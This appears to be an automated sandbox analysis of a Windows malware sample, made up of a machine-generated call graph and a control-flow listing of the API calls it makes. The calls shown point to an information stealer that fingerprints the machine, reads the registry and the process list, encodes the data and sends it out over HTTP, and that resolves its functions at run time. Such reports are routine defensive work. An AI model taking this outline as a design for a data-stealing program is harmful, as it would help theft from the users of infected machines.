lstrcpy 14875->14876 14877 de5e5d 14876->14877 14878 de5e70 lstrlen 14877->14878 15674 dfaad0 14878->15674 14880 de5e81 lstrlen GetProcessHeap RtlAllocateHeap 15675 dfaad0 14880->15675 14882 de5eae lstrlen 14883 de5ebe 14882->14883 14884 de5ed7 lstrlen 14883->14884 14885 de5ee7 14884->14885 14886 de5ef0 lstrlen 14885->14886 14887 de5f03 14886->14887 14888 de5f1a lstrlen 14887->14888 15676 dfaad0 14888->15676 14890 de5f2a HttpSendRequestA 14891 de5f35 InternetReadFile 14890->14891 14892 de5f6a InternetCloseHandle 
14891->14892 14896 de5f61 14891->14896 14892->14817 14894 dfa9b0 4 API calls 14894->14896 14895 dfa8a0 lstrcpy 14895->14896 14896->14891 14896->14892 14896->14894 14896->14895 14899 df1077 14897->14899 14898 df1151 14898->13668 14899->14898 14900 dfa820 lstrlen lstrcpy 14899->14900 14900->14899 14902 df0db7 14901->14902 14903 df0e27 StrCmpCA 14902->14903 14904 df0e67 StrCmpCA 14902->14904 14905 df0ea4 StrCmpCA 14902->14905 14906 df0f17 14902->14906 14907 dfa820 lstrlen lstrcpy 14902->14907 14903->14902 14904->14902 14905->14902 14906->13676 14907->14902 14909 df0f67 14908->14909 14910 df1044 14909->14910 14911 df0fb2 StrCmpCA 14909->14911 14912 dfa820 lstrlen lstrcpy 14909->14912 14910->13684 14911->14909 14912->14909 14914 dfa740 lstrcpy 14913->14914 14915 df1a26 14914->14915 14916 dfa9b0 4 API calls 14915->14916 14917 df1a37 14916->14917 14918 dfa8a0 lstrcpy 14917->14918 14919 df1a40 14918->14919 14920 dfa9b0 4 API calls 14919->14920 14921 df1a5b 14920->14921 14922 dfa8a0 lstrcpy 14921->14922 14923 df1a64 14922->14923 14924 dfa9b0 4 API calls 14923->14924 14925 df1a7d 14924->14925 14926 dfa8a0 lstrcpy 14925->14926 14927 df1a86 14926->14927 14928 dfa9b0 4 API calls 14927->14928 14929 df1aa1 14928->14929 14930 dfa8a0 lstrcpy 14929->14930 14931 df1aaa 14930->14931 14932 dfa9b0 4 API calls 14931->14932 14933 df1ac3 14932->14933 14934 dfa8a0 lstrcpy 14933->14934 14935 df1acc 14934->14935 14936 dfa9b0 4 API calls 14935->14936 14937 df1ae7 14936->14937 14938 dfa8a0 lstrcpy 14937->14938 14939 df1af0 14938->14939 14940 dfa9b0 4 API calls 14939->14940 14941 df1b09 14940->14941 14942 dfa8a0 lstrcpy 14941->14942 14943 df1b12 14942->14943 14944 dfa9b0 4 API calls 14943->14944 14945 df1b2d 14944->14945 14946 dfa8a0 lstrcpy 14945->14946 14947 df1b36 14946->14947 14948 dfa9b0 4 API calls 14947->14948 14949 df1b4f 14948->14949 14950 dfa8a0 lstrcpy 14949->14950 14951 df1b58 14950->14951 14952 dfa9b0 4 API calls 14951->14952 14953 df1b76 14952->14953 14954 dfa8a0 lstrcpy 
14953->14954 14955 df1b7f 14954->14955 14956 df7500 6 API calls 14955->14956 14957 df1b96 14956->14957 14958 dfa920 3 API calls 14957->14958 14959 df1ba9 14958->14959 14960 dfa8a0 lstrcpy 14959->14960 14961 df1bb2 14960->14961 14962 dfa9b0 4 API calls 14961->14962 14963 df1bdc 14962->14963 14964 dfa8a0 lstrcpy 14963->14964 14965 df1be5 14964->14965 14966 dfa9b0 4 API calls 14965->14966 14967 df1c05 14966->14967 14968 dfa8a0 lstrcpy 14967->14968 14969 df1c0e 14968->14969 15677 df7690 GetProcessHeap RtlAllocateHeap 14969->15677 14972 dfa9b0 4 API calls 14973 df1c2e 14972->14973 14974 dfa8a0 lstrcpy 14973->14974 14975 df1c37 14974->14975 14976 dfa9b0 4 API calls 14975->14976 14977 df1c56 14976->14977 14978 dfa8a0 lstrcpy 14977->14978 14979 df1c5f 14978->14979 14980 dfa9b0 4 API calls 14979->14980 14981 df1c80 14980->14981 14982 dfa8a0 lstrcpy 14981->14982 14983 df1c89 14982->14983 15684 df77c0 GetCurrentProcess IsWow64Process 14983->15684 14986 dfa9b0 4 API calls 14987 df1ca9 14986->14987 14988 dfa8a0 lstrcpy 14987->14988 14989 df1cb2 14988->14989 14990 dfa9b0 4 API calls 14989->14990 14991 df1cd1 14990->14991 14992 dfa8a0 lstrcpy 14991->14992 14993 df1cda 14992->14993 14994 dfa9b0 4 API calls 14993->14994 14995 df1cfb 14994->14995 14996 dfa8a0 lstrcpy 14995->14996 14997 df1d04 14996->14997 14998 df7850 3 API calls 14997->14998 14999 df1d14 14998->14999 15000 dfa9b0 4 API calls 14999->15000 15001 df1d24 15000->15001 15002 dfa8a0 lstrcpy 15001->15002 15003 df1d2d 15002->15003 15004 dfa9b0 4 API calls 15003->15004 15005 df1d4c 15004->15005 15006 dfa8a0 lstrcpy 15005->15006 15007 df1d55 15006->15007 15008 dfa9b0 4 API calls 15007->15008 15009 df1d75 15008->15009 15010 dfa8a0 lstrcpy 15009->15010 15011 df1d7e 15010->15011 15012 df78e0 3 API calls 15011->15012 15013 df1d8e 15012->15013 15014 dfa9b0 4 API calls 15013->15014 15015 df1d9e 15014->15015 15016 dfa8a0 lstrcpy 15015->15016 15017 df1da7 15016->15017 15018 dfa9b0 4 API calls 15017->15018 15019 df1dc6 15018->15019 
15020 dfa8a0 lstrcpy 15019->15020 15021 df1dcf 15020->15021 15022 dfa9b0 4 API calls 15021->15022 15023 df1df0 15022->15023 15024 dfa8a0 lstrcpy 15023->15024 15025 df1df9 15024->15025 15686 df7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15025->15686 15028 dfa9b0 4 API calls 15029 df1e19 15028->15029 15030 dfa8a0 lstrcpy 15029->15030 15031 df1e22 15030->15031 15032 dfa9b0 4 API calls 15031->15032 15033 df1e41 15032->15033 15034 dfa8a0 lstrcpy 15033->15034 15035 df1e4a 15034->15035 15036 dfa9b0 4 API calls 15035->15036 15037 df1e6b 15036->15037 15038 dfa8a0 lstrcpy 15037->15038 15039 df1e74 15038->15039 15688 df7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15039->15688 15042 dfa9b0 4 API calls 15043 df1e94 15042->15043 15044 dfa8a0 lstrcpy 15043->15044 15045 df1e9d 15044->15045 15046 dfa9b0 4 API calls 15045->15046 15047 df1ebc 15046->15047 15048 dfa8a0 lstrcpy 15047->15048 15049 df1ec5 15048->15049 15050 dfa9b0 4 API calls 15049->15050 15051 df1ee5 15050->15051 15052 dfa8a0 lstrcpy 15051->15052 15053 df1eee 15052->15053 15691 df7b00 GetUserDefaultLocaleName 15053->15691 15056 dfa9b0 4 API calls 15057 df1f0e 15056->15057 15058 dfa8a0 lstrcpy 15057->15058 15059 df1f17 15058->15059 15060 dfa9b0 4 API calls 15059->15060 15061 df1f36 15060->15061 15062 dfa8a0 lstrcpy 15061->15062 15063 df1f3f 15062->15063 15064 dfa9b0 4 API calls 15063->15064 15065 df1f60 15064->15065 15066 dfa8a0 lstrcpy 15065->15066 15067 df1f69 15066->15067 15695 df7b90 15067->15695 15069 df1f80 15070 dfa920 3 API calls 15069->15070 15071 df1f93 15070->15071 15072 dfa8a0 lstrcpy 15071->15072 15073 df1f9c 15072->15073 15074 dfa9b0 4 API calls 15073->15074 15075 df1fc6 15074->15075 15076 dfa8a0 lstrcpy 15075->15076 15077 df1fcf 15076->15077 15078 dfa9b0 4 API calls 15077->15078 15079 df1fef 15078->15079 15080 dfa8a0 lstrcpy 15079->15080 15081 df1ff8 15080->15081 15707 df7d80 GetSystemPowerStatus 15081->15707 15084 dfa9b0 4 API calls 15085 df2018 15084->15085 15086 dfa8a0 
lstrcpy 15085->15086 15087 df2021 15086->15087 15088 dfa9b0 4 API calls 15087->15088 15089 df2040 15088->15089 15090 dfa8a0 lstrcpy 15089->15090 15091 df2049 15090->15091 15092 dfa9b0 4 API calls 15091->15092 15093 df206a 15092->15093 15094 dfa8a0 lstrcpy 15093->15094 15095 df2073 15094->15095 15096 df207e GetCurrentProcessId 15095->15096 15709 df9470 OpenProcess 15096->15709 15099 dfa920 3 API calls 15100 df20a4 15099->15100 15101 dfa8a0 lstrcpy 15100->15101 15102 df20ad 15101->15102 15103 dfa9b0 4 API calls 15102->15103 15104 df20d7 15103->15104 15105 dfa8a0 lstrcpy 15104->15105 15106 df20e0 15105->15106 15107 dfa9b0 4 API calls 15106->15107 15108 df2100 15107->15108 15109 dfa8a0 lstrcpy 15108->15109 15110 df2109 15109->15110 15714 df7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15110->15714 15113 dfa9b0 4 API calls 15114 df2129 15113->15114 15115 dfa8a0 lstrcpy 15114->15115 15116 df2132 15115->15116 15117 dfa9b0 4 API calls 15116->15117 15118 df2151 15117->15118 15119 dfa8a0 lstrcpy 15118->15119 15120 df215a 15119->15120 15121 dfa9b0 4 API calls 15120->15121 15122 df217b 15121->15122 15123 dfa8a0 lstrcpy 15122->15123 15124 df2184 15123->15124 15718 df7f60 15124->15718 15127 dfa9b0 4 API calls 15128 df21a4 15127->15128 15129 dfa8a0 lstrcpy 15128->15129 15130 df21ad 15129->15130 15131 dfa9b0 4 API calls 15130->15131 15132 df21cc 15131->15132 15133 dfa8a0 lstrcpy 15132->15133 15134 df21d5 15133->15134 15135 dfa9b0 4 API calls 15134->15135 15136 df21f6 15135->15136 15137 dfa8a0 lstrcpy 15136->15137 15138 df21ff 15137->15138 15731 df7ed0 GetSystemInfo wsprintfA 15138->15731 15141 dfa9b0 4 API calls 15142 df221f 15141->15142 15143 dfa8a0 lstrcpy 15142->15143 15144 df2228 15143->15144 15145 dfa9b0 4 API calls 15144->15145 15146 df2247 15145->15146 15147 dfa8a0 lstrcpy 15146->15147 15148 df2250 15147->15148 15149 dfa9b0 4 API calls 15148->15149 15150 df2270 15149->15150 15151 dfa8a0 lstrcpy 15150->15151 15152 df2279 15151->15152 15733 df8100 GetProcessHeap 
RtlAllocateHeap 15152->15733 15155 dfa9b0 4 API calls 15156 df2299 15155->15156 15157 dfa8a0 lstrcpy 15156->15157 15158 df22a2 15157->15158 15159 dfa9b0 4 API calls 15158->15159 15160 df22c1 15159->15160 15161 dfa8a0 lstrcpy 15160->15161 15162 df22ca 15161->15162 15163 dfa9b0 4 API calls 15162->15163 15164 df22eb 15163->15164 15165 dfa8a0 lstrcpy 15164->15165 15166 df22f4 15165->15166 15739 df87c0 15166->15739 15169 dfa920 3 API calls 15170 df231e 15169->15170 15171 dfa8a0 lstrcpy 15170->15171 15172 df2327 15171->15172 15173 dfa9b0 4 API calls 15172->15173 15174 df2351 15173->15174 15175 dfa8a0 lstrcpy 15174->15175 15176 df235a 15175->15176 15177 dfa9b0 4 API calls 15176->15177 15178 df237a 15177->15178 15179 dfa8a0 lstrcpy 15178->15179 15180 df2383 15179->15180 15181 dfa9b0 4 API calls 15180->15181 15182 df23a2 15181->15182 15183 dfa8a0 lstrcpy 15182->15183 15184 df23ab 15183->15184 15744 df81f0 15184->15744 15186 df23c2 15187 dfa920 3 API calls 15186->15187 15188 df23d5 15187->15188 15189 dfa8a0 lstrcpy 15188->15189 15190 df23de 15189->15190 15191 dfa9b0 4 API calls 15190->15191 15192 df240a 15191->15192 15193 dfa8a0 lstrcpy 15192->15193 15194 df2413 15193->15194 15195 dfa9b0 4 API calls 15194->15195 15196 df2432 15195->15196 15197 dfa8a0 lstrcpy 15196->15197 15198 df243b 15197->15198 15199 dfa9b0 4 API calls 15198->15199 15200 df245c 15199->15200 15201 dfa8a0 lstrcpy 15200->15201 15202 df2465 15201->15202 15203 dfa9b0 4 API calls 15202->15203 15204 df2484 15203->15204 15205 dfa8a0 lstrcpy 15204->15205 15206 df248d 15205->15206 15207 dfa9b0 4 API calls 15206->15207 15208 df24ae 15207->15208 15209 dfa8a0 lstrcpy 15208->15209 15210 df24b7 15209->15210 15752 df8320 15210->15752 15212 df24d3 15213 dfa920 3 API calls 15212->15213 15214 df24e6 15213->15214 15215 dfa8a0 lstrcpy 15214->15215 15216 df24ef 15215->15216 15217 dfa9b0 4 API calls 15216->15217 15218 df2519 15217->15218 15219 dfa8a0 lstrcpy 15218->15219 15220 df2522 15219->15220 15221 dfa9b0 4 API calls 
15220->15221 15222 df2543 15221->15222 15223 dfa8a0 lstrcpy 15222->15223 15224 df254c 15223->15224 15225 df8320 17 API calls 15224->15225 15226 df2568 15225->15226 15227 dfa920 3 API calls 15226->15227 15228 df257b 15227->15228 15229 dfa8a0 lstrcpy 15228->15229 15230 df2584 15229->15230 15231 dfa9b0 4 API calls 15230->15231 15232 df25ae 15231->15232 15233 dfa8a0 lstrcpy 15232->15233 15234 df25b7 15233->15234 15235 dfa9b0 4 API calls 15234->15235 15236 df25d6 15235->15236 15237 dfa8a0 lstrcpy 15236->15237 15238 df25df 15237->15238 15239 dfa9b0 4 API calls 15238->15239 15240 df2600 15239->15240 15241 dfa8a0 lstrcpy 15240->15241 15242 df2609 15241->15242 15788 df8680 15242->15788 15244 df2620 15245 dfa920 3 API calls 15244->15245 15246 df2633 15245->15246 15247 dfa8a0 lstrcpy 15246->15247 15248 df263c 15247->15248 15249 df265a lstrlen 15248->15249 15250 df266a 15249->15250 15251 dfa740 lstrcpy 15250->15251 15252 df267c 15251->15252 15253 de1590 lstrcpy 15252->15253 15254 df268d 15253->15254 15798 df5190 15254->15798 15256 df2699 15256->13688 15986 dfaad0 15257->15986 15259 de5009 InternetOpenUrlA 15263 de5021 15259->15263 15260 de502a InternetReadFile 15260->15263 15261 de50a0 InternetCloseHandle InternetCloseHandle 15262 de50ec 15261->15262 15262->13692 15263->15260 15263->15261 15987 de98d0 15264->15987 15266 df0759 15267 df077d 15266->15267 15268 df0a38 15266->15268 15271 df0799 StrCmpCA 15267->15271 15269 de1590 lstrcpy 15268->15269 15270 df0a49 15269->15270 16163 df0250 15270->16163 15273 df0843 15271->15273 15274 df07a8 15271->15274 15277 df0865 StrCmpCA 15273->15277 15276 dfa7a0 lstrcpy 15274->15276 15278 df07c3 15276->15278 15279 df0874 15277->15279 15316 df096b 15277->15316 15280 de1590 lstrcpy 15278->15280 15281 dfa740 lstrcpy 15279->15281 15282 df080c 15280->15282 15284 df0881 15281->15284 15285 dfa7a0 lstrcpy 15282->15285 15283 df099c StrCmpCA 15286 df09ab 15283->15286 15287 df0a2d 15283->15287 15288 dfa9b0 4 API calls 15284->15288 15289 df0823 
15285->15289 15290 de1590 lstrcpy 15286->15290 15287->13696 15291 df08ac 15288->15291 15292 dfa7a0 lstrcpy 15289->15292 15293 df09f4 15290->15293 15294 dfa920 3 API calls 15291->15294 15295 df083e 15292->15295 15297 dfa7a0 lstrcpy 15293->15297 15298 df08b3 15294->15298 15990 defb00 15295->15990 15299 df0a0d 15297->15299 15300 dfa9b0 4 API calls 15298->15300 15301 dfa7a0 lstrcpy 15299->15301 15302 df08ba 15300->15302 15303 df0a28 15301->15303 15304 dfa8a0 lstrcpy 15302->15304 16106 df0030 15303->16106 15316->15283 15638 dfa7a0 lstrcpy 15637->15638 15639 de1683 15638->15639 15640 dfa7a0 lstrcpy 15639->15640 15641 de1695 15640->15641 15642 dfa7a0 lstrcpy 15641->15642 15643 de16a7 15642->15643 15644 dfa7a0 lstrcpy 15643->15644 15645 de15a3 15644->15645 15645->14519 15647 de47c6 15646->15647 15648 de4838 lstrlen 15647->15648 15672 dfaad0 15648->15672 15650 de4848 InternetCrackUrlA 15651 de4867 15650->15651 15651->14596 15653 dfa740 lstrcpy 15652->15653 15654 df8b74 15653->15654 15655 dfa740 lstrcpy 15654->15655 15656 df8b82 GetSystemTime 15655->15656 15657 df8b99 15656->15657 15658 dfa7a0 lstrcpy 15657->15658 15659 df8bfc 15658->15659 15659->14611 15661 dfa931 15660->15661 15662 dfa988 15661->15662 15664 dfa968 lstrcpy lstrcat 15661->15664 15663 dfa7a0 lstrcpy 15662->15663 15665 dfa994 15663->15665 15664->15662 15665->14615 15666->14729 15668 de4eee 15667->15668 15669 de9af9 LocalAlloc 15667->15669 15668->14617 15668->14620 15669->15668 15670 de9b14 CryptStringToBinaryA 15669->15670 15670->15668 15671 de9b39 LocalFree 15670->15671 15671->15668 15672->15650 15673->14739 15674->14880 15675->14882 15676->14890 15805 df77a0 15677->15805 15680 df1c1e 15680->14972 15681 df76c6 RegOpenKeyExA 15682 df76e7 RegQueryValueExA 15681->15682 15683 df7704 RegCloseKey 15681->15683 15682->15683 15683->15680 15685 df1c99 15684->15685 15685->14986 15687 df1e09 15686->15687 15687->15028 15689 df7a9a wsprintfA 15688->15689 15690 df1e84 15688->15690 15689->15690 15690->15042 15692 df7b4d 
15691->15692 15693 df1efe 15691->15693 15812 df8d20 LocalAlloc CharToOemW 15692->15812 15693->15056 15696 dfa740 lstrcpy 15695->15696 15697 df7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15696->15697 15706 df7c25 15697->15706 15698 df7d18 15700 df7d1e LocalFree 15698->15700 15701 df7d28 15698->15701 15699 df7c46 GetLocaleInfoA 15699->15706 15700->15701 15702 dfa7a0 lstrcpy 15701->15702 15705 df7d37 15702->15705 15703 dfa9b0 lstrcpy lstrlen lstrcpy lstrcat 15703->15706 15704 dfa8a0 lstrcpy 15704->15706 15705->15069 15706->15698 15706->15699 15706->15703 15706->15704 15708 df2008 15707->15708 15708->15084 15710 df94b5 15709->15710 15711 df9493 GetModuleFileNameExA CloseHandle 15709->15711 15712 dfa740 lstrcpy 15710->15712 15711->15710 15713 df2091 15712->15713 15713->15099 15715 df7e68 RegQueryValueExA 15714->15715 15716 df2119 15714->15716 15717 df7e8e RegCloseKey 15715->15717 15716->15113 15717->15716 15719 df7fb9 GetLogicalProcessorInformationEx 15718->15719 15720 df7fd8 GetLastError 15719->15720 15726 df8029 15719->15726 15721 df8022 15720->15721 15730 df7fe3 15720->15730 15724 df2194 15721->15724 15725 df89f0 2 API calls 15721->15725 15724->15127 15725->15724 15727 df89f0 2 API calls 15726->15727 15728 df807b 15727->15728 15728->15721 15729 df8084 wsprintfA 15728->15729 15729->15724 15730->15719 15730->15724 15813 df89f0 15730->15813 15816 df8a10 GetProcessHeap RtlAllocateHeap 15730->15816 15732 df220f 15731->15732 15732->15141 15734 df89b0 15733->15734 15735 df814d GlobalMemoryStatusEx 15734->15735 15736 df8163 __aulldiv 15735->15736 15737 df819b wsprintfA 15736->15737 15738 df2289 15737->15738 15738->15155 15740 df87fb GetProcessHeap RtlAllocateHeap wsprintfA 15739->15740 15742 dfa740 lstrcpy 15740->15742 15743 df230b 15742->15743 15743->15169 15745 dfa740 lstrcpy 15744->15745 15746 df8229 15745->15746 15747 df8263 15746->15747 15750 dfa9b0 lstrcpy lstrlen lstrcpy lstrcat 15746->15750 15751 dfa8a0 lstrcpy 15746->15751 15748 dfa7a0 lstrcpy 
15747->15748 15749 df82dc 15748->15749 15749->15186 15750->15746 15751->15746 15753 dfa740 lstrcpy 15752->15753 15754 df835c RegOpenKeyExA 15753->15754 15755 df83ae 15754->15755 15756 df83d0 15754->15756 15757 dfa7a0 lstrcpy 15755->15757 15758 df83f8 RegEnumKeyExA 15756->15758 15759 df8613 RegCloseKey 15756->15759 15769 df83bd 15757->15769 15760 df843f wsprintfA RegOpenKeyExA 15758->15760 15761 df860e 15758->15761 15762 dfa7a0 lstrcpy 15759->15762 15763 df8485 RegCloseKey RegCloseKey 15760->15763 15764 df84c1 RegQueryValueExA 15760->15764 15761->15759 15762->15769 15767 dfa7a0 lstrcpy 15763->15767 15765 df84fa lstrlen 15764->15765 15766 df8601 RegCloseKey 15764->15766 15765->15766 15768 df8510 15765->15768 15766->15761 15767->15769 15770 dfa9b0 4 API calls 15768->15770 15769->15212 15771 df8527 15770->15771 15772 dfa8a0 lstrcpy 15771->15772 15773 df8533 15772->15773 15774 dfa9b0 4 API calls 15773->15774 15775 df8557 15774->15775 15776 dfa8a0 lstrcpy 15775->15776 15777 df8563 15776->15777 15778 df856e RegQueryValueExA 15777->15778 15778->15766 15779 df85a3 15778->15779 15780 dfa9b0 4 API calls 15779->15780 15781 df85ba 15780->15781 15782 dfa8a0 lstrcpy 15781->15782 15783 df85c6 15782->15783 15784 dfa9b0 4 API calls 15783->15784 15785 df85ea 15784->15785 15786 dfa8a0 lstrcpy 15785->15786 15787 df85f6 15786->15787 15787->15766 15789 dfa740 lstrcpy 15788->15789 15790 df86bc CreateToolhelp32Snapshot Process32First 15789->15790 15791 df875d CloseHandle 15790->15791 15792 df86e8 Process32Next 15790->15792 15793 dfa7a0 lstrcpy 15791->15793 15792->15791 15797 df86fd 15792->15797 15796 df8776 15793->15796 15794 dfa9b0 lstrcpy lstrlen lstrcpy lstrcat 15794->15797 15795 dfa8a0 lstrcpy 15795->15797 15796->15244 15797->15792 15797->15794 15797->15795 15799 dfa7a0 lstrcpy 15798->15799 15800 df51b5 15799->15800 15801 de1590 lstrcpy 15800->15801 15802 df51c6 15801->15802 15817 de5100 15802->15817 15804 df51cf 15804->15256 15808 df7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 
15805->15808 15807 df76b9 15807->15680 15807->15681 15809 df7765 RegQueryValueExA 15808->15809 15810 df7780 RegCloseKey 15808->15810 15809->15810 15811 df7793 15810->15811 15811->15807 15812->15693 15814 df8a0c 15813->15814 15815 df89f9 GetProcessHeap HeapFree 15813->15815 15814->15730 15815->15814 15816->15730 15818 dfa7a0 lstrcpy 15817->15818 15819 de5119 15818->15819 15820 de47b0 2 API calls 15819->15820 15821 de5125 15820->15821 15977 df8ea0 15821->15977 15823 de5184 15824 de5192 lstrlen 15823->15824 15825 de51a5 15824->15825 15826 df8ea0 4 API calls 15825->15826 15827 de51b6 15826->15827 15828 dfa740 lstrcpy 15827->15828 15829 de51c9 15828->15829 15830 dfa740 lstrcpy 15829->15830 15831 de51d6 15830->15831 15832 dfa740 lstrcpy 15831->15832 15833 de51e3 15832->15833 15834 dfa740 lstrcpy 15833->15834 15835 de51f0 15834->15835 15836 dfa740 lstrcpy 15835->15836 15837 de51fd InternetOpenA StrCmpCA 15836->15837 15838 de522f 15837->15838 15839 de58c4 InternetCloseHandle 15838->15839 15840 df8b60 3 API calls 15838->15840 15845 de58d9 codecvt 15839->15845 15841 de524e 15840->15841 15842 dfa920 3 API calls 15841->15842 15843 de5261 15842->15843 15844 dfa8a0 lstrcpy 15843->15844 15846 de526a 15844->15846 15850 dfa7a0 lstrcpy 15845->15850 15847 dfa9b0 4 API calls 15846->15847 15848 de52ab 15847->15848 15849 dfa920 3 API calls 15848->15849 15851 de52b2 15849->15851 15858 de5913 15850->15858 15852 dfa9b0 4 API calls 15851->15852 15853 de52b9 15852->15853 15854 dfa8a0 lstrcpy 15853->15854 15855 de52c2 15854->15855 15856 dfa9b0 4 API calls 15855->15856 15857 de5303 15856->15857 15859 dfa920 3 API calls 15857->15859 15858->15804 15860 de530a 15859->15860 15861 dfa8a0 lstrcpy 15860->15861 15862 de5313 15861->15862 15863 de5329 InternetConnectA 15862->15863 15863->15839 15864 de5359 HttpOpenRequestA 15863->15864 15866 de58b7 InternetCloseHandle 15864->15866 15867 de53b7 15864->15867 15866->15839 15868 dfa9b0 4 API calls 15867->15868 15869 de53cb 15868->15869 15870 dfa8a0 lstrcpy 
15869->15870 15871 de53d4 15870->15871 15872 dfa920 3 API calls 15871->15872 15873 de53f2 15872->15873 15874 dfa8a0 lstrcpy 15873->15874 15875 de53fb 15874->15875 15876 dfa9b0 4 API calls 15875->15876 15877 de541a 15876->15877 15878 dfa8a0 lstrcpy 15877->15878 15879 de5423 15878->15879 15880 dfa9b0 4 API calls 15879->15880 15881 de5444 15880->15881 15882 dfa8a0 lstrcpy 15881->15882 15883 de544d 15882->15883 15884 dfa9b0 4 API calls 15883->15884 15885 de546e 15884->15885 15978 df8ead CryptBinaryToStringA 15977->15978 15979 df8ea9 15977->15979 15978->15979 15980 df8ece GetProcessHeap RtlAllocateHeap 15978->15980 15979->15823 15980->15979 15981 df8ef4 codecvt 15980->15981 15982 df8f05 CryptBinaryToStringA 15981->15982 15982->15979 15986->15259 16229 de9880 15987->16229 15989 de98e1 15989->15266 15991 dfa740 lstrcpy 15990->15991 16164 dfa740 lstrcpy 16163->16164 16165 df0266 16164->16165 16166 df8de0 2 API calls 16165->16166 16167 df027b 16166->16167 16168 dfa920 3 API calls 16167->16168 16169 df028b 16168->16169 16170 dfa8a0 lstrcpy 16169->16170 16171 df0294 16170->16171 16172 dfa9b0 4 API calls 16171->16172 16230 de988d 16229->16230 16233 de6fb0 16230->16233 16232 de98ad codecvt 16232->15989 16236 de6d40 16233->16236 16237 de6d63 16236->16237 16251 de6d59 16236->16251 16252 de6530 16237->16252 16241 de6dbe 16241->16251 16262 de69b0 16241->16262 16243 de6e2a 16244 de6ee6 VirtualFree 16243->16244 16246 de6ef7 16243->16246 16243->16251 16244->16246 16245 de6f41 16249 df89f0 2 API calls 16245->16249 16245->16251 16246->16245 16247 de6f38 16246->16247 16248 de6f26 FreeLibrary 16246->16248 16250 df89f0 2 API calls 16247->16250 16248->16246 16249->16251 16250->16245 16251->16232 16254 de6542 16252->16254 16253 de6549 16253->16251 16256 de6660 16253->16256 16254->16253 16272 df8a10 GetProcessHeap RtlAllocateHeap 16254->16272 16261 de668f VirtualAlloc 16256->16261 16258 de673c 16258->16241 16259 de6730 16259->16258 16260 de6743 VirtualAlloc 16259->16260 16260->16258 
16261->16258 16261->16259 16263 de69c9 16262->16263 16267 de69d5 16262->16267 16264 de6a09 LoadLibraryA 16263->16264 16263->16267 16265 de6a32 16264->16265 16264->16267 16270 de6ae0 16265->16270 16273 df8a10 GetProcessHeap RtlAllocateHeap 16265->16273 16267->16243 16268 de6a8b 16268->16267 16271 df89f0 2 API calls 16268->16271 16269 de6ba8 GetProcAddress 16269->16267 16269->16270 16270->16267 16270->16269 16271->16270 16272->16253 16273->16268

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 df9860-df9874 call df9750 663 df987a-df9a8e call df9780 GetProcAddress * 21 660->663 664 df9a93-df9af2 LoadLibraryA * 5 660->664 663->664 666 df9b0d-df9b14 664->666 667 df9af4-df9b08 GetProcAddress 664->667 669 df9b46-df9b4d 666->669 670 df9b16-df9b41 GetProcAddress * 2 666->670 667->666 671 df9b4f-df9b63 GetProcAddress 669->671 672 df9b68-df9b6f 669->672 670->669 671->672 673 df9b89-df9b90 672->673 674 df9b71-df9b84 GetProcAddress 672->674 675 df9b92-df9bbc GetProcAddress * 2 673->675 676 df9bc1-df9bc2 673->676 674->673 675->676
                          APIs
                          • GetProcAddress.KERNEL32(76210000,00831650), ref: 00DF98A1
                          • GetProcAddress.KERNEL32(76210000,00831638), ref: 00DF98BA
                          • GetProcAddress.KERNEL32(76210000,00831668), ref: 00DF98D2
                          • GetProcAddress.KERNEL32(76210000,00831698), ref: 00DF98EA
                          • GetProcAddress.KERNEL32(76210000,00831728), ref: 00DF9903
                          • GetProcAddress.KERNEL32(76210000,00838C48), ref: 00DF991B
                          • GetProcAddress.KERNEL32(76210000,008250A8), ref: 00DF9933
                          • GetProcAddress.KERNEL32(76210000,008250E8), ref: 00DF994C
                          • GetProcAddress.KERNEL32(76210000,008316B0), ref: 00DF9964
                          • GetProcAddress.KERNEL32(76210000,008316C8), ref: 00DF997C
                          • GetProcAddress.KERNEL32(76210000,00831740), ref: 00DF9995
                          • GetProcAddress.KERNEL32(76210000,00831758), ref: 00DF99AD
                          • GetProcAddress.KERNEL32(76210000,00825068), ref: 00DF99C5
                          • GetProcAddress.KERNEL32(76210000,008316E0), ref: 00DF99DE
                          • GetProcAddress.KERNEL32(76210000,00831530), ref: 00DF99F6
                          • GetProcAddress.KERNEL32(76210000,00824FE8), ref: 00DF9A0E
                          • GetProcAddress.KERNEL32(76210000,00831518), ref: 00DF9A27
                          • GetProcAddress.KERNEL32(76210000,00831548), ref: 00DF9A3F
                          • GetProcAddress.KERNEL32(76210000,008252A8), ref: 00DF9A57
                          • GetProcAddress.KERNEL32(76210000,00831800), ref: 00DF9A70
                          • GetProcAddress.KERNEL32(76210000,00825168), ref: 00DF9A88
                          • LoadLibraryA.KERNEL32(00831830,?,00DF6A00), ref: 00DF9A9A
                          • LoadLibraryA.KERNEL32(00831848,?,00DF6A00), ref: 00DF9AAB
                          • LoadLibraryA.KERNEL32(008317E8,?,00DF6A00), ref: 00DF9ABD
                          • LoadLibraryA.KERNEL32(00831878,?,00DF6A00), ref: 00DF9ACF
                          • LoadLibraryA.KERNEL32(00831890,?,00DF6A00), ref: 00DF9AE0
                          • GetProcAddress.KERNEL32(75B30000,00831818), ref: 00DF9B02
                          • GetProcAddress.KERNEL32(751E0000,00831860), ref: 00DF9B23
                          • GetProcAddress.KERNEL32(751E0000,008318A8), ref: 00DF9B3B
                          • GetProcAddress.KERNEL32(76910000,00838EC0), ref: 00DF9B5D
                          • GetProcAddress.KERNEL32(75670000,008251A8), ref: 00DF9B7E
                          • GetProcAddress.KERNEL32(77310000,00838B38), ref: 00DF9B9F
                          • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00DF9BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00DF9BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
